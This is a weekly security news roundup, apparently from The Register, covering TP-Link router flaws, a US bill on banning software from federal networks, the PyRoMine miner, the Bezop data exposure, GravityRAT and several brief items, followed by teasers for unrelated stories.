Windows USB-stick-of-death, router bugs resurrected, and more

Your weekend guide to computer security cockups


Roundup Here's your summary of infosec news – from router holes to Windows crashes – beyond what we've already covered this week.

TPLink? More like TPwnedLink, amiright? Anyone?

Tim Carrington at Fidus Infosec went public on Thursday with not-so-new remote-code execution flaws in TPLink router firmware. We're told the security holes (CVE-2017-13772) were not only reported to TPLink in October 2017, but were vulnerabilities that the company had patched in older models, only for the bugs to resurface when the exploitable code was reused in newer units.

"Code reuse is a huge problem within the IoT industry," Fidus stated in its advisory. "In most cases, what we generally see is a company who sells devices with poor security to vendors who then brand them and sell them on. Tracking the original manufacturer can be quite difficult and, in our experience, getting such vulnerabilities patched is even harder."

The stack-overflow bugs can be exploited via the built-in HTTP web server, used to configure the device, to gain control of the router. It appears to have to be able to log into the equipment to leverage the programming blunders, so make sure you're not using the default credentials.

DiFi wants an express lane for banning software

Fresh on the heels of Uncle Sam blacklisting security company Kaspersky Lab from its computers, US Congress mulls streamlining the process of blocking particular software packages from being used on government networks and systems.

Senator Dianne Feinstein (D-CA) is putting her name on the Federal Network Protection Act, a bill that would give the Secretary of Homeland Security the ability to issue binding operational directives – strict orders, in other words – to remove software from federal networks without requiring that the vendor be notified first.

"We're seeing more and more attacks on federal computer systems by foreign agents, and we need to make sure we have all the tools and authorities necessary to block those attacks,” Feinstein said.

"By clarifying what actions the Secretary of Homeland Security can take, we allow the department to act quickly in response to cyber threats."

PyRoMine fires up EternalBlue flaw to forge Monero

Another day, another pack of criminals finding new and creative ways to make a buck on cryptocoins.

This time, it's the creators of a horrible piece of malware called PyRoMine. It uses the compute power of infected Windows machines to generate Monero cryptocurrency for its controllers. What's worse, the code spreads itself using the infamous EternalBlue and EternalRomance NSA-developed exploits. Sounds scary, but as Mounir Hahad of Juniper Threat Labs told El Reg, both flaws have long-since been patched by Microsoft. If you're infected via these exploits, you need to take a long hard look at yourself.

"EternalRomance and EternalBlue are only made eternal by our inaction," Hahad said.

"A patch to close the vulnerabilities that these exploits use has been available since before the WannaCry era."

Bezop says be-ware, we got be-reached

Elsewhere in the world of internet funbux, blockchain commerce biz Bezop is on the defensive after researchers at Kromtech disclosed that the upstart had exposed to the public internet a poorly configured MongoDB database containing the names, email addresses, hashed passwords, and scans of IDs and passports for 25,000 of its ICO backers.

Bezop says it's no big deal, as the incident actually occurred in January.

"If you remember, we reported a DDoS attack and a couple of security holes that unintentionally exposed user data such as name, wallet addresses, address on file, copies of identification documents, etc., and that they could possibly be in the public domain. That database has since been closed and secured."

We're sure the 25,000 people whose passport images were leaked out will find that very comforting.

Cisco smells a RAT

Cisco Talos researchers dished the dirt on GravityRAT, a software nasty targeting peeps in India. They say the malware was used to pull sensitive information from companies and organizations in the country for nearly two years before it was caught.

"GravityRAT has been under ongoing development for at least 18 months, during which the developer has implemented new features. We've seen file exfiltration, remote command execution capability and anti-vm techniques added throughout the life of GravityRAT," Talos writes.

"This consistent evolution beyond standard remote code execution is concerning because it shows determination and innovation by the actor."

Quick links

MikroTik router owners must patch their devices' firmware to prevent miscreants from exploiting a flaw in a remote administration service to swipe a copy of the user database – it is already being leveraged in the wild by scumbags to commandeer affected hardware. Also, don't forget to secure access to your HPE iLO management interfaces for your servers: hackers are exploiting poorly defended networks to hold systems to ransom.

Bitdefender bloke Marius Tivadar has developed a dodgy NTFS file system image that crashes at least Windows 7 and 10 systems: popping it on a USB stick and then plugging that into a vulnerable computer will cause it to fall over with a blue-screen-of-death when a mount attempt is made. Microsoft will not issue a patch for the programming blunder, we're told.

Medical transcription biz MEDantex leaked patient records for thousands of physicians online, according to investigative reporter Brian Krebs. Revenge porn web exchange Anon-IB was seized by Dutch police, who also collared five suspects related to the image-sharing site.

If you go traveling with your Mac, or leave it unattended around strangers, try out Objective-See's new Do Not Disturb app that thwarts evil-maid-style attempts to tamper with your computer or infect it with spyware.

Finally, Check Point warned that your Windows login details can be nicked by opening malicious PDFs that use remote document loading mechanisms to leak your credentials. ®


Other stories you might like

  • Cisco execs pledge simpler, more integrated networks
    Is this the end of Switchzilla's dashboard creep?

    Cisco Live In his first in-person Cisco Live keynote in two years, CEO Chuck Robbins didn't make any lofty claims about how AI is taking over the network or how the company's latest products would turn networking on its head. Instead, the presentation was all about working with customers to make their lives easier.

    "We need to simplify the things that we do with you. If I think back to eight or ten years ago, I think we've made progress, but we still have more to do," he said, promising to address customers' biggest complaints with the networking giant's various platforms.

    "Everything we find that is inhibiting your experience from being the best that it can be, we're going to tackle," he declared, appealing to customers to share their pain points at the show.

    Continue reading
  • China's blockchain boosters slam crypto as Ponzi scheme
    Communists reckon Bill Gates and Warren Buffet got it right

    Executives at China's Blockchain-based Service Network (BSN) – a state-backed initiative aimed at driving the commercial adoption of blockchain technology – labelled cryptocurrency "the biggest Ponzi scheme in human history" in state-sponsored media on Sunday.

    "The author of this article believes that virtual currency is becoming the largest Ponzi scheme in human history, and in order to maintain this scam, the currency circle has tried to put on various cloaks for it," wrote Shan Zhiguang and He Yifan in the People's Daily.

    He Yifan is the CEO of startup Red Date Technology – a founding member and architect behind BSN – where he serves as executive director. Co-author Zhiguang Shan is chair of the BSN Development Alliance.

    Continue reading
  • If you're using older, vulnerable Cisco small biz routers, throw them out
    Severe security flaw won't be fixed – as patches released this week for other bugs

    If you thought you were over the hump with Patch Tuesday then perhaps think again: Cisco has just released fixes for a bunch of flaws, two of which are not great.

    First on the priority list should be a critical vulnerability in its enterprise security appliances, and the second concerns another critical bug in some of its outdated small business routers that it's not going to fix. In other words, junk your kit or somehow mitigate the risk.

    Both of these received a CVSS score of 9.8 out of 10 in severity. The IT giant urged customers to patch affected security appliances ASAP if possible, and upgrade to newer hardware if you're still using an end-of-life, buggy router. We note that miscreants aren't actively exploiting either of these vulnerabilities — yet.

    Continue reading

Biting the hand that feeds IT © 1998–2022